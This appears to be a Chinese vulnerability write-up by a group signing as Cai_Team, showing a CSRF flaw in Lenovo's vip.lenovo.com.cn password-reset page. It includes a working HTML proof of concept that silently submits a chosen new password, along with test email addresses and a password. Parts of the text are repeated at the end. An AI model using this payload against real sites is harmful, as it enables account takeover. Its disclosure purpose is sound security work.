漏洞挖掘经验之联想E采存在Csrf漏洞

内部资料，禁止外泄!

危害：当用户点击我( 攻击者 )构造好的Csrf Poc后，他们的密码就会修改成我( 攻击者 )设置好的密码~

先注册两个账号，邮箱分别为 `clickjacking@126.com` 和 `623425849@qq.com`,其中 `623425849@qq.com` 的密码为 `12345678aa`

这里都按照正常流程操作,在忘记密码处输入用户名`clickjacking@126.com`

csrf1.png-150.5kB

点下一步，输入邮箱发送过来的验证码.

点下一步，输入新密码，抓包.

csrf3.png-62kB

将数据包制作成Csrf Poc，如下

<html>
<body>
<form style="display:none;" name="px" method="post" action="http://vip.lenovo.com.cn/Account/ForgotPassword/UpdateForgotPassword">
    <input type="hidden" name="newPassword1" value="123456789aa&#126;" />
    <input type="hidden" name="newPassword2" value="123456789aa&#126;" />
    <input type="hidden" name="next" value="�&#184;&#139;�&#184;&#128;�&#173;&#165;" /></FORM>
<script>document.px.submit();</script>
</body>
</html>

浏览器处打开html文件

csrf5.png-180.1kB

我们再输入原先的密码

csrf6.png-196.3kB

可以看到是失败的

输入新密码123456789aa~

csrf7.png-90.6kB

csrf8.png-88.5kB

发现可以登录，说明Csrf漏洞利用成功

十年寒窗无人问，一举成名天下知
– Cai_Team

先注册两个账号，邮箱分别为 clickjacking@126.com 和 623425849@qq.com,其中 623425849@qq.com 的密码为 12345678aa

这里都按照正常流程操作,在忘记密码处输入用户名clickjacking@126.com

点下一步，输入邮箱发送过来的验证码.

点下一步，输入新密码，抓包.

将数据包制作成Csrf Poc，如下

浏览器处打开html文件

我们再输入原先的密码

输入新密码123456789aa~

先注册两个账号，邮箱分别为 `clickjacking@126.com` 和 `623425849@qq.com`,其中 `623425849@qq.com` 的密码为 `12345678aa`

这里都按照正常流程操作,在忘记密码处输入用户名`clickjacking@126.com`